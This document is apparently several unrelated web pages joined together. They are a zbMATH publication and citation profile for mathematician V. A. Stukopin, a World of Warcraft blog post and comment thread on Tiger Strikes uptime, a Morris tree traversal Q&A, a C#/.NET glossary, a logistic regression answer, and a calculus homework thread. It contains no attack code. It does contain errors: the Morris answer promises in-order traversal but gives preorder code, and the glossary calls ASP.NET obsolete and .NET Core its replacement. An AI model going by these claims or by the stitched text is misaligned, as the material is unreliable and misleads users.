4 Functional Analysis and its Applications 3 Theoretical and Mathematical Physics 3 Vladikavkazskiĭ Matematicheskiĭ Zhurnal 2 Linear Algebra and its Applications 2 Russian Academy of Sciences. Doklady. Mathematics 1 Letters in Mathematical Physics 1 Mathematical Notes 1 Integral Equations and Operator Theory 1 Izvestiya Severo-Kavkazskogo Nauchnogo Tsentra Vyssheĭ Shkoly. Estestvennye Nauki 1 Journal of Mathematical Sciences (New York) 1 Izvestiya: Mathematics 1 Izvestiya Vysshikh Uchebnykh Zavedeniĭ. Severo-Kavkazskiĭ Region. Estestvennye Nauki 1 Fundamental’naya i Prikladnaya Matematika 1 Lobachevskii Journal of Mathematics 1 SIGMA. Symmetry, Integrability and Geometry: Methods and Applications
all top 5
### Fields
15 Nonassociative rings and algebras (17-XX) 7 Operator theory (47-XX) 5 Linear and multilinear algebra; matrix theory (15-XX) 3 Approximations and expansions (41-XX) 3 Functional analysis (46-XX) 3 Numerical analysis (65-XX) 3 Quantum theory (81-XX) 2 Associative rings and algebras (16-XX) 2 Integral equations (45-XX) 1 History and biography (01-XX) 1 $$K$$-theory (19-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Algebraic topology (55-XX)
### Citations contained in zbMATH Open
18 Publications have been cited 88 times in 51 Documents Cited by Year
The quantum Weyl group and the universal quantum $$R$$-matrix for affine Lie algebra $$A^{(1)}_ 1$$. Zbl 0776.17011
Levendorskij, Serge; Soibelman, Yan; Stukopin, Vladimir
1993
Yangians of Lie superalgebras of type $$A(m,n)$$. Zbl 0862.17011
Stukopin, V. A.
1994
Asymptotics of eigenvalues of symmetric Toeplitz band matrices. Zbl 1318.47043
Batalshchikov, A. A.; Grudsky, S. M.; Stukopin, V. A.
2015
The Yangian double of the Lie superalgebra $$A(m,n)$$. Zbl 1152.17007
Stukopin, V. A.
2006
Yangian of the strange Lie superalgebra of $$Q_{n-1}$$ type, Drinfel’d approach. Zbl 1234.17013
2007
Representations of the Yangian of a Lie superalgebra of type $$A(m,n)$$. Zbl 1303.17013
Stukopin, V. A.
2013
Twisted Yangians, Drinfeld approach. Zbl 1213.17017
Stukopin, V.
2009
Asymptotics of eigenvectors of large symmetric banded Toeplitz matrices. Zbl 1330.15032
Batalshchikov, A.; Grudsky, S.; Ramírez de Arellano, E.; Stukopin, V.
2015
Representations theory and doubles of Yangians of classical Lie superalgebras. Zbl 1041.17007
2002
The quantum double of the Yangian of the Lie superalgebra $$A(m,n)$$ of the universal $$R$$-matrix. Zbl 1072.17008
Stukopin, V. A.
2005
The Yangian of the strange Lie superalgebra and its quantum double. Zbl 1311.17009
Stukopin, V. A.
2013
Isomorphism of the Yangian $$Y_{\hbar}(A(m, n))$$ of the special linear Lie superalgebra and the quantum loop superalgebra $$U_{\hbar}(LA(m, n))$$. Zbl 1429.17017
Stukopin, V. A.
2019
Yangians of classical Lie superalgebras. Zbl 1122.17011
Stukopin, V.
2004
The index of families of Noether singular and bisingular operators with piecewise continuous coefficients on composite contours. Zbl 0859.45005
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1994
Ideals of a Banach algebra of singular integral operators with piecewise continuous coefficients in the space $$L_ p$$ on a composite contour. Zbl 0832.46043
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
Homotopy classification of families of Noetherian singular operators with piecewise continuous coefficients on a composite contour. Zbl 0814.45006
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
Asymptotics of eigenvalues of large symmetric Toeplitz matrices with smooth simple-loop symbols. Zbl 1420.15019
Batalshchikov, A. A.; Grudsky, S. M.; Malisheva, I. S.; Mihalkovich, S. S.; Ramírez de Arellano, E.; Stukopin, V. A.
2019
On a universal algebra of singular operators on a closed interval. Zbl 0666.47022
Stukopin, V. A.; Simonenko, I. B.
1987
Isomorphism of the Yangian $$Y_{\hbar}(A(m, n))$$ of the special linear Lie superalgebra and the quantum loop superalgebra $$U_{\hbar}(LA(m, n))$$. Zbl 1429.17017
Stukopin, V. A.
2019
Asymptotics of eigenvalues of large symmetric Toeplitz matrices with smooth simple-loop symbols. Zbl 1420.15019
Batalshchikov, A. A.; Grudsky, S. M.; Malisheva, I. S.; Mihalkovich, S. S.; Ramírez de Arellano, E.; Stukopin, V. A.
2019
Asymptotics of eigenvalues of symmetric Toeplitz band matrices. Zbl 1318.47043
Batalshchikov, A. A.; Grudsky, S. M.; Stukopin, V. A.
2015
Asymptotics of eigenvectors of large symmetric banded Toeplitz matrices. Zbl 1330.15032
Batalshchikov, A.; Grudsky, S.; Ramírez de Arellano, E.; Stukopin, V.
2015
Representations of the Yangian of a Lie superalgebra of type $$A(m,n)$$. Zbl 1303.17013
Stukopin, V. A.
2013
The Yangian of the strange Lie superalgebra and its quantum double. Zbl 1311.17009
Stukopin, V. A.
2013
Twisted Yangians, Drinfeld approach. Zbl 1213.17017
Stukopin, V.
2009
Yangian of the strange Lie superalgebra of $$Q_{n-1}$$ type, Drinfel’d approach. Zbl 1234.17013
2007
The Yangian double of the Lie superalgebra $$A(m,n)$$. Zbl 1152.17007
Stukopin, V. A.
2006
The quantum double of the Yangian of the Lie superalgebra $$A(m,n)$$ of the universal $$R$$-matrix. Zbl 1072.17008
Stukopin, V. A.
2005
Yangians of classical Lie superalgebras. Zbl 1122.17011
Stukopin, V.
2004
Representations theory and doubles of Yangians of classical Lie superalgebras. Zbl 1041.17007
2002
Yangians of Lie superalgebras of type $$A(m,n)$$. Zbl 0862.17011
Stukopin, V. A.
1994
The index of families of Noether singular and bisingular operators with piecewise continuous coefficients on composite contours. Zbl 0859.45005
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1994
The quantum Weyl group and the universal quantum $$R$$-matrix for affine Lie algebra $$A^{(1)}_ 1$$. Zbl 0776.17011
Levendorskij, Serge; Soibelman, Yan; Stukopin, Vladimir
1993
Ideals of a Banach algebra of singular integral operators with piecewise continuous coefficients in the space $$L_ p$$ on a composite contour. Zbl 0832.46043
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
Homotopy classification of families of Noetherian singular operators with piecewise continuous coefficients on a composite contour. Zbl 0814.45006
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
On a universal algebra of singular operators on a closed interval. Zbl 0666.47022
Stukopin, V. A.; Simonenko, I. B.
1987
all top 5
### Cited by 52 Authors
11 Stukopin, Vladimir Alekseevich 7 Razumov, Alexander V. 4 Grudsky, Sergei Mikhailovich 4 Zhang, Honglian 3 Beck, Jonathan 3 Böttcher, Albrecht 3 Göhmann, Frank 3 Hu, Naihong 3 Klümper, Andreas 3 Nirov, Khazret S. 2 Batalshchikov, A. A. 2 Bogoya, Johan M. 2 Frenkel, Edward V. 2 Jing, Naihuan 2 Maksimenko, Egor A. 2 Ramírez de Arellano, Enrique 2 Torrielli, Alessandro 2 Tsymbaliuk, Oleksandr 2 Zolotykh, Svetlana Andreevna 1 Boos, Herman E. 1 Boos, Hermann 1 Chen, Hongjia 1 Damiani, Ilaria 1 Deundyak, Vladimir Mikhaĭlovich 1 Ekstrom, Sven-Erik 1 Elouafi, Mohamed 1 Feng, Ge 1 Gow, Lucy 1 Gromov, Nikolay A. 1 Guay, Nicolas 1 Hakobyan, Tigran Stepanovich 1 Hayaishi, Norifumi 1 Jia, Xiaoyu 1 Kac, Victor G. 1 Kaplitskiĭ, Vitaliĭ Markovich 1 Levkovich-Maslyuk, Fedor 1 Luo, Cuiling 1 Malisheva, I. S. 1 Mihalkovich, S. S. 1 Miki, Kei 1 Molev, Alexander I. 1 Mukhin, Evgeny 1 Negut, Andrei 1 Peng, Yung-Ning 1 Reshetikhin, Nikolai Yu. 1 Rosso, Marc 1 Sedrakyan, Ara 1 Simonenko, Igor’ Borisovich 1 Spill, Fabian 1 Vassalos, Paris 1 Yao, Shao-Kui 1 Zhuang, Rushu
all top 5
### Cited in 30 Serials
6 Communications in Mathematical Physics 6 Theoretical and Mathematical Physics 4 Letters in Mathematical Physics 3 Journal of Geometry and Physics 3 Advances in Mathematics 2 Journal of Mathematical Physics 2 Linear Algebra and its Applications 2 Journal of Mathematical Sciences (New York) 2 Vladikavkazskiĭ Matematicheskiĭ Zhurnal 1 Communications in Algebra 1 Mathematical Notes 1 Nuclear Physics. B 1 Reviews in Mathematical Physics 1 Annales Scientifiques de l’École Normale Supérieure. Quatrième Série 1 Integral Equations and Operator Theory 1 Journal of Algebra 1 Journal of Computational and Applied Mathematics 1 Mathematische Zeitschrift 1 Journal of the American Mathematical Society 1 Numerical Algorithms 1 Advances in Applied Clifford Algebras 1 Selecta Mathematica. New Series 1 Boletín de la Sociedad Matemática Mexicana. Third Series 1 Sbornik: Mathematics 1 Izvestiya: Mathematics 1 Acta Mathematica Sinica. English Series 1 Journal of High Energy Physics 1 Lobachevskii Journal of Mathematics 1 SIGMA. Symmetry, Integrability and Geometry: Methods and Applications 1 Advances in Mathematical Physics
all top 5
### Cited in 16 Fields
36 Nonassociative rings and algebras (17-XX) 17 Quantum theory (81-XX) 15 Associative rings and algebras (16-XX) 10 Linear and multilinear algebra; matrix theory (15-XX) 6 Numerical analysis (65-XX) 5 Operator theory (47-XX) 4 Statistical mechanics, structure of matter (82-XX) 3 Group theory and generalizations (20-XX) 2 Approximations and expansions (41-XX) 2 Relativity and gravitational theory (83-XX) 1 History and biography (01-XX) 1 Algebraic geometry (14-XX) 1 Topological groups, Lie groups (22-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Special functions (33-XX) 1 Algebraic topology (55-XX) |
# 6.2 Tiger Strikes uptime
Update: Geodew has correctly pointed out that because of the low amount of proc events within the duration of the buff, and because you can’t have partial attacks, the Poisson process is not valid. Check back for a corrected post later today. (view the bottom of this post, and the comments, for the conclusion I came to with Hamlet)
As we covered earlier in the 6.2 first look, the structure of Tiger Strikes is changing. It’s losing the ability to proc from multistrikes, but increasing the amount of multistrike it gives when it does proc. So currently, you have a 10% proc chance on all melee attacks and melee multistrikes, and after the patch, it’s merely a 10% proc chance on all melee attacks, but not their multistrikes.
The primary difficulties in theorycrafting the uptime for Tiger Strikes are the fact that it can overlap itself, refreshing the buff instead of stacking or adding time, and the fact that when Tiger Strikes is up, you have a higher chance of further Tiger Strikes chances because of the higher multistrike chance it gives. The 6.2 change removes this second aspect, so all you have to worry about is the overlapping procs.
I was first looking at the effects of weapon speed, haste, and multistrike on Tiger Strikes about two months ago, and ran into all of these same issues. I asked noted WoW theorycrafter Hamlet if he had any tips and he pointed me in the direction of this post, which didn’t quite work out for me because it had the same issues with the multistrike buff. I kept it in the back of my mind, though, and in 6.2, it’ll be perfectly applicable.
If you scroll down to “More Elaborate PPM: Overlaps and Poisson”, this is exactly what we need. Tiger Strikes has a proc chance rather than being PPM, but the PPM isn’t the essential part of the formula anyway. The uptime formula is $1 - e^{-\lambda}$, where $\lambda$ is the average procs in the duration of the buff. Then we just have to figure out how many times we attack every 8 seconds (the duration of Tiger Strikes), multiply by .1, and there you have it. The result for $\lambda$ is .1*(8/(Base Weapon Speed/(1+raid buffed haste))), with (1+ raid buffed haste) multiplied by 1.55 if you have a two-hander to account for Way of the Monk. The final formula you have for Tiger Strikes is then
$1-e^{-{.1*(8/(BAT/(1+RBH)))}}$
We’ll then check this against our sim , which gave us an estimated 46.08% uptime with base attack speed of 1.6 and 1007 haste. That turns into 19.08% raid buffed haste with haste food. Plugging these values in gives us a result of 44.86%, which is close enough for me to breathe a sigh of relief over my sim being mostly accurate.
The section I chose from that post was wrong for these purposes. I missed the most important part: “This is a good model for WoW procs as long as the attack rate is very high compared to the time intervals being examined.” With 3-6 attacks in that 8 second period, that requirement is not met. Instead, we can use the first formula from the appendix, as follows.
${1-(1-P)^N}$
In our case, P is the proc chance, 0.1, and N is the number of attacks in the buff period, or how many attacks you can fit into 8 seconds. This is simply 8/(BAT/(1+RBH%/100)). Geodew points out that since attacks are discrete events, you should round down. In our case, with 1007 haste and 250 haste from food, raid buffed haste is 19.665, and base attack speed is 1.9. 8/(1.6/(1+19.665/100))=5.98325, which we truncate to 5. Then you do 1-(1-.1)^5 = .4095, or 40.95%. This is a fair amount lower than the other approximation, which invites further investigation.
If we treat partial attacks as valid, we don’t truncate at all. 1-(1-.1)^5.98325 = .467620, which is 46.76%. This is strikingly close to the simulated result of 46.08%. I’m not saying the sim is perfect, but it does seem curious that the result is so much closer to the non-truncated result. Perhaps treating attacks as discrete is the wrong way to approach it, over long periods of time? Perhaps the sim is way off? I’ll run it again in a few hours when I get home to check the numbers.
Final edit: I got home and ran a longer sim, covering 999,999,999 milliseconds, the equivalent of 277.78 hours. I also made sure to use 250 haste food rather than 200 multistrike food, which I had in an earlier version of the sim. The estimated uptime was 46.76%. I now feel fairly confident in saying treating attacks as discrete events is an incorrect approach.
## 21 thoughts on “6.2 Tiger Strikes uptime”
1. arawethion says:
That’s a very odd result. There’s no reason you wouldn’t expect an integer number of attacks, so it’s worth poking at this more.
One thing that might be confounding it is that you picked a setup where the # of attacks just is just under an integer (5.98). In theory that shouldn’t matter, because it’s 5 attacks and not 6, and should be the same TS uptime as with 5.01 attacks in the window, but maybe the fact that it’s so close to 6 affects the simulation.
Does the simulation include any temporary haste effects of any kind?
Is there any way to check the sim output it detail to see whether, whenever you get a single TS proc, it in fact buffs only 5 swings?
Basically, now that the MS complication is removed, the discrete model should be a very good one. And while something unexpected can always come up in the real world that makes a model incorrect, it’s different for something unexpected to come up in the simulation (since the simulation only reflects our knowledge, not any unexpected/unknown behaviors). The simulation must be making some assumption that causes the calculation to not be right. It’s worth figuring out what that is so they can be reconciled.
Like
2. arawethion says:
Also, is the sim measuring “uptime” of the buff, or % of attacks affected? The latter is what matters and what my formula computes.
Like
1. I suspect this may be the key here. The sim measures the uptime of the buff. Although Tiger Strikes only procs off of autoattacks, the increase in multistrike% affects all damage events, no matter their source. Because we want to look at the % of all attacks affected, not the % of of autoattacks affected, that’s why I believe we should use the continuous formula rather than the discrete.
Like
1. Actually now that I think about it further, to account for DPS gain from added Tiger Strikes, perhaps I should use a weighted average of the discrete formula and the continuous formula, based on how many attacks in each 8 second period are autoattacks and how many are otherwise.
Like
2. arawethion says:
Yeah, it seems that in a full DPS model, you should use the un-truncated one for the TS uptime (i.e. % of attacks affected) for special attacks, and the truncated one for white attacks. I hadn’t thought about that before–it should be a very accurate model.
Getting such a good confirmation of the basic formula in a simulation (once we sorted out the tricky part) is really neat too.
Like
3. My method on MMOC with n=6 (since I use a different definition of n) and swing speed of (1.6/1.19665) yields 47.4021%.
0.1*(0.9)^6 = 46.856% (but this may be a coincidence since 5.98325 is so close to 6. Maybe choose a different swing speed for testing?)
I’ll try to figure out the discrepancies tomorrow.
Like
1. Uh, I typed up an entire reply, but I’m not sure it went through… Fucking a… I’ll have to type it up again tomorrow unless it’s just pending and I can’t see it or something, as I’ve got to go. In short, my formula is correct, but I must have punched it in the calculator wrong. The answer is 0.46756992925.
Like
1. (as you can see, the fractional exponent thing you did is close, but not correct, and would become more incorrect the farther you go from an integer)
Like
2. Did you see the conclusion Hamlet and I came to above regarding discrete vs continuous and white hits vs special attacks?
Also, I don’t see any pending posts, so I think it went into the void.
Like
3. I think I see the problem because it just happened again. The comment is too long to be accepted, and it just deletes it instead of doing anything intelligent. Sorry, but I’ll have to post it in chunks. Wisely, I saved it in a document before trying to post again.
——————————————————————————————————–
Yes, I did see what you guys said, and I was trying to reply :P. It seemed like Hamlet was not sure whether or not the expression
1-(1-p)^(8/(swing speed)) = 1-(1-.1)^5.98325
was correctly giving the %time uptime, though. I’m claiming that it is not correct, nor is 1-(1-.1)^5, nor is the continuous-time poisson process model you did.
Hamlet was correct in realizing that 1-(1-p)^n gives uptime only in the sense of “percentage of autoattacks for which Tiger Strikes is up.” That’s not the formula we want, though, as you two realized; we want “percentage of time for which Tiger Strikes is up.” To help you understand, let me re-derive the formula for the former:
Tiger Strikes average “uptime,” for autoattacks ONLY
= P[Tiger Strikes is up at the time of any given autoattack]
= P[Tiger Strikes has procced in the last 8 seconds, given the current time is that of an autoattack]
= P[Tiger Strikes has procced in the last n autoattack swings]
>> where n = floor(8 / T), i.e. Hamlet’s definition; T = time between autoattack swings, including haste effects
= 1 – P[Tiger Strikes has NOT procced in the last n autoattack swings]
>> Assume 6.2 proc behavior for now
= 1 – (1-p)^n
Q.E.D.
Like
Tiger Strikes average uptime for all steady-state time
= P[Tiger Strikes is up at time t]
>> where t is a uniformly random variable in [8.0, infinity] (8.0 to allow steady-state)
= SUM(P[i autoattacks occurred in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after i subsequent attacks]) for i = 0 to +infinity
= P[n autoattacks occured in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after n subsequent attacks] + P[n+1 autoattacks occured in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after n+1 subsequent attacks]
>> See http://imgur.com/OCJYrvM to convince yourself of the above step and the next step
>> Still assuming 6.2 proc behavior
= (((n+1)*T – 8.0) / T) * (1 – (1-p)^n) + (((8.0+T) – (n+1)*T) / T) * (1 – (1-p)^(n+1))
>> for n=5, T=1.6/1.19665, and p=0.1, yields 0.46756992925, which is more than reasonably close to the simulation to give credibility
Q.E.D.
However, this makes assumptions about the proc behavior. The reason I derived the formula the way I did on MMOC is because the MMOC formula is easily extensible to the 6.1 case.
Like
5. In fact, we can prove the equivalence of the two expressions (i.e. the one above and the first one I derived on MMOC) with some mathemagical algebra.
Tiger Strikes average uptime for all steady-state time
= (((n+1)*T – 8.0) / T) * (1 – (1-p)^n) + (((8.0+T) – (n+1)*T) / T) * (1 – (1-p)^(n+1))
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^(n+1)) * ((8.0+T) – (n+1)*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^(n+1)) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^n + p*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^n) * (8.0 – n*T) / T + (p*(1-p)^n) * (8.0 – n*T) / T
Like
6. = (1-(1-p)^n) * (((n+1)*T – 8.0) + (8.0 – n*T)) / T + (p*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) + (p*(1-p)^n) * (8.0 – n*T) / T
= 1 – (1-p)^n + (p*(1-p)^n) * (8.0/T) – n*p*(1-p)^n)
= 1 – (1-p)^n * (1+n*p) + (p*(1-p)^n)*(8.0/T)
>> Let N = n + 1 = my MMOC definition of n; => n = N-1
= 1 – (1-p)^(N-1) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
Like
7. (wtf? my character limit is going down with each post)
>> Now begins a pattern
= 1 – (1-p)*(1-p)^(N-2) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-1)*p) + p*(1-p)^(N-2) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-1)*p) + p*(1-p)^(N-2) + p*(1-p)^(N-2) * ((N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
Like
8. = 1 – (1-p)^(N-2) * (1+(N-1)*p-p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
Like
9. >> Now begins 2nd iteration of pattern
= 1 – (1-p)*(1-p)^(N-3) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-3) * (1+(N-2)*p) + p*(1-p)^(N-3) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
Like
10. = 1 – (1-p)^(N-3) * (1+(N-2)*p) + p*(1-p)^(N-3) + p*(1-p)^(N-3) * ((N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
Like
11. = 1 – (1-p)^(N-3) * (1+(N-2)*p-p) + (N-2)*p*p*(1-p)^(N-3) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
Like
12. Posting one line at a time is dumb. Fuck this, posting on MMOC. Stupid automated anti-spam thing
Like
4. I tried looking for something to extend the comment length but no dice 😦
Like |
# What is Morris Traversal for a Tree and how to implement one?
Technology CommunityCategory: Binary TreeWhat is Morris Traversal for a Tree and how to implement one?
VietMX Staff asked 5 months ago
Morris (In-Order) traversal is a tree traversal algorithm that does not employ the use of recursion or a stack. In this traversal, links are created as successors and nodes are printed using these links. Finally, the changes are reverted back to restore the original tree.
Basically a tree is threaded by making all right child pointers that would normally be null point to the inorder successor of the node (if it exists), and all left child pointers that would normally be null point to the inorder predecessor of the node. Consider:
Algorithm:
• Initialize the root as the current node curr.
• While curr is not NULL, check if curr has a left child.
• If curr does not have a left child, print curr and update it to point to the node on the right of curr.
• Else, make curr the right child of the rightmost node in curr‘s left subtree.
• Update curr to this left node.
Complexity Analysis
The way of looking at time complexity is to find out how many times a tree node will be traversed. As it is constant (3 times for a binary tree). So we are looking at O(n).
Implementation
public class MorrisPreorderTraversal { static class Node { //static class to represent node structure int data; //to store data of each node Node left, right; //to point to left and right child of the node respectively Node(int d) { //constructor for initialisation of each values this.data = d; this.left = null; this.right = null; } } public static void printPreorder(Node root) { if (root == null) { //if tree is empty return; } while (root != null) { if (root.left == null) { //if left child is empty System.out.print(root.data + " "); //traverse current node and root = root.right; //move to it's right } else { Node curr = root.left; //to store inorder predecessor while (curr.right != null && curr.right != root) { curr = curr.right; } if (curr.right == root) { //if right child of inorder predecessor points to root node itself curr.right = null; root = root.right; } else { //otherwise System.out.print(root.data + " "); //traverse current node curr.right = root; //make right child of inorder predecessor point to this node root = root.left; } } } } public static void main(String args[]) { Node root = new Node(1); root.left = new Node(2); root.right = new Node(3); root.left.left = new Node(4); root.left.right = new Node(5); root.right.left = new Node(6); root.right.right = new Node(7); printPreorder(root); }}/* -:Sample Input Tree:- 1 / \ 2 3 / \ / \ 4 5 6 7-:Sample Output:-1 2 4 5 3 6 7 -:Time Complexity:-O(n) where n is the number of nodes in the given tree-:Space Complexity:-O(1) */ |
## C# & .NET Terminology Demystified: A Glossary
After my last glossary post on LoRa, I thought I'd write another one of C♯ and .NET, as (in typical Microsoft fashion it would seem), they're seems to be a lot of jargon floating around whose meaning is not always obvious.
If you're new to C♯ and the .NET ecosystems, I wouldn't recommend tackling all of this at once - especially the bottom ~3 definitions - with those in particular there's a lot to get your head around.
### C♯
C♯ is an object-oriented programming language that was invented by Microsoft. It's cross-platform, and is usually written in an IDE (Integrated Development Environment), which has a deeper understanding of the code you write than a regular text editor. IDEs include Visual Studio (for Windows) and MonoDevelop (for everyone else).
### Solution
A Solution (sometimes referred to as a Visual Studio Solution) is the top-level definition of a project, contained in a file ending in .sln. Each solution may contain one or more Project Files (not to be confused with the project you're working on itself), each of which gets compiled into a single binary. Each project may have its own dependencies too: whether they be a core standard library, another project, or a NuGet package.
### Project
A project contains your code, and sits 1 level down from a solution file. Normally, a solution file will sit in the root directory of your repository, and the projects will each have their own sub-folders.
While each project has a single output file (be that a .dll class library or a standalone .exe executable), a project may have multiple dependencies - leading to many files in the build output folder.
The build process and dependency definitions for a project are defined in the .csproj file. This file is written in XML, and can be edited to perform advanced build steps, should you need to do something that the GUI of your IDE doesn't support. I've blogged about the structuring of this file before (see here, and also a bit more here), should you find yourself curious.
### CIL
Known as Common Intermediate Language, CIL is the binary format that C♯ (also Visual Basic and F♯ code) code gets compiled into. From here, the .NET runtime (on Windows) or Mono (on macOS, Linux, etc.) can execute it to run the compiled project.
### MSBuild
The build system for Solutions and Projects. It reads a .sln or .csproj (there are others for different languages, but I won't list them here) file and executes the defined build instructions.
### .NET Framework
The .NET Framework is the standard library of C♯ it provides practically everything you'll need to perform most common tasks. It does not provide a framework for constructing GUIs and Graphical Interfaces. You can browse the API reference over at the official .NET API Browser.
### WPF
The Windows Presentation Foundation is a Windows-only GUI framework. Powered by XAML (eXtensible Application Markup Language) definitions of what the GUI should look like, it provides everything you need to create a native-looking GUI on Windows.
It does not work on macOS and Linux. To create a cross-platform program that works on all 3 operating systems, you'll need to use an alternative GUI framework, such as XWT or Gtk# (also: Glade). A more complete list of cross-platform frameworks can be found here. It's worth noting that Windows Forms, although a tempting option, aren't as flexible as the other options listed here.
### C♯ 7
The 7th version of the C♯ language specification. This includes the syntax of the language, but not the .NET Framework itself.
### .NET Standard
A specification of the .NET Framework, but not the C♯ Language. As of the time of typing, the latest version is 2.0, although version 1.6 is commonly used too. The intention here is the improve cross-platform portability of .NET programs by defining a specification for a subset of the full .NET Framework standard library that all platforms will always be able to use. This includes Android and iOS through the use of Xamarin.
Note that all .NET Standard projects are class libraries. In order to create an executable, you'll have to add an additional Project to your Solution that references your .NET Standard class library.
### ASP.NET
A web framework for .NET-based programming languages (in our case C♯). Allows you to write C♯ code to handle HTTP (and now WebSockets) requests in a similar manner to PHP, but different in that your code still needs compiling. Compiled code is then managed by a web server IIS web server (on Windows).
With the release of .NET Core, ASP.NET is now obsolete.
### .NET Core
Coming in 2 versions so far (1.0 and 2.0), .NET Core is the replacement for ASP.NET (though this is not its exclusive purpose). As far as I understand it, .NET Core is a modular runtime that allows programs targeting it to run multiple platforms. Such programs can either be ASP.NET Core, or a Universal Windows Platform application for the Windows Store.
This question and answer appears to have the best explanation I've found so far. In particular, the displayed diagram is very helpful:
....along with the pair of official "Introducing" blog posts that I've included in the Sources and Further Reading section below.
### Conclusion
We've looked at some of the confusing terminology in the .NET ecosystems, and examined each of them in turn. We started by defining and untangling the process by which your C♯ code is compiled and run, and then moved on to the different variants and specifications related to the .NET Framework and C♯.
As always, this is a starting point - not an ending point! I'd recommend doing some additional reading and experimentation to figure out all the details.
Found this helpful? Still confused? Spotted a mistake? Comment below! |
# Logistic regression for classification?
I have a dataset with most columns having Boolean values and categorical values. A sample of it is:
Name Country approved political
bbc.com US true True
stackoverflow.com US true False
Number.com US False False
...
Based of values above, I would like to determine if other websites have been approved or not.
My questions are:
does any heat/correlation map/matrix sense with categorical variables?
Would it be possible to predict if a website is approved or not (target variable), using caterogical values?
Is there any other model that should be preferable?
Thanks
Logistic regression is a standard method of performing binary classification, which matches your task here. Categorical variables can be dealt with, depending on the model you choose.
You can see from the Scikit-Learn documentation on logistic regression, that your data only really needs to be of a certain shape: (num_samples, num_features). It might ignore the columns that are non-numerical, so you should convert e.g. strings to class IDs (e.g. integers) - see below.
Computing the correlation can make sense for categorical values, but to compute these, you need to provide numerical values; strings like "bbc.com" or "US" won't work.
You can map each of the values to a numerical value and make a new column with that data using pd.factorize like this:
df["Country_id"] = pd.factorize(df.Country)[0] # taking the first return element: the ID values
df["Name_id"] = pd.factorize(df.Name)[0]
You don't need to do it really for the approved and political columns, because they hold boolean values, which are seen by Python as 0 and 1 for False and True, respectively.
Now you can do something like this to see a correlation plot:
import matplotlib.pyplot as plt # plotting library: pip install matplotlib
# compute the correlation matrix
corr_mat = df[["Name_id", "Country_id", "approved", "political"]].corr()
# plot it
plt.matshow(corr_mat)
plt.show()
It looks like there are two part to your question ,
1. You want to explore data before predicting the values to gain insights about the data which falls under Visual analytics in which EDA (Exploratory data analysis) helps. Regarding the question of choosing right kind of plot to see the distribution for categorical data please refer below links which gives a very basic understanding of choosing the right chart type. Later on you can move to reading papers on visualization.
https://en.wikipedia.org/wiki/Data_visualization is a good starting point. Also I prefer reading articles on Medium papers are getting too heavy to start, few are below
For this specific data I would be much more interested in seeing the count plot () of target variable and scatter plots for co- relation. Seaborn has nice feature of seeing pair plots after converting these features to numeric types as suggested in first answer.
1. On availability of models for classification, your data comes under supervised classification problem since it has labels, there are choices like, based on probabilities (Naive Bayes), neural network, logistic regression etc. In practice we try different models, tune the parameters see the performance and do the model evaluation to see if the model is working well on unseen data, which is called generalization performance. Feel free to try libraries like Ski-Learn which gives options you to implement and see the performance of each one of it. https://scikit-learn.org/stable/auto_examples/index.html#classification Specifically for Logistic regression in order to under please refer- https://web.stanford.edu/~jurafsky/slp3/5.pdf To understand Classification in very simple words please refer- Introduction to Data Mining by Vipin kumar, MICHAEL STEINBACH, PANG-NING TAN Classification chapter is available for free. |
# Average value quest.
If the average salary $$S$$ of an NBA player is increasing and can be modeled by: $$\frac{dS}{dt} = \frac{1137.7}{\sqrt{t}} + 521.3$$ and $$t = 5$$ is 1985.
a. Find the salary function in terms of the year if the average salary in 1985 was $325,000. b. If the average salary continues to increase at this rate, in which year will the salary be$4,000,000?
Would I use the Mean Value Thoerem?
Any help is appreciated
Thanks
Related Introductory Physics Homework Help News on Phys.org
Have you done any work on this problem yet? Do you know what the answer is supposed to be for part b?
Why would you use the Mean Value Theorem? You have an easily separable DEQ with the initial condition S(5) = 325000. Just solve it for S(t), and then find S-1(4000000).
--J
Justin Lazear said:
Why would you use the Mean Value Theorem? You have an easily separable DEQ with the initial condition S(5) = 325000. Just solve it for S(t), and then find S-1(4000000).
--J
Correct me if I'm missing something here, but the equation has dS/dt and t in it, making it simply a first derivative. All that's needed is integrating the expression, and then setting the expression equal to S(5) and finding the constant of integration.
I'm not seeing where you're getting a Diff Eq from, when the equation doesn't contain a variable and it's derivative.
scholzie said:
Correct me if I'm missing something here, but the equation has dS/dt and t in it, making it simply a first derivative. All that's needed is integrating the expression, and then setting the expression equal to S(5) and finding the constant of integration.
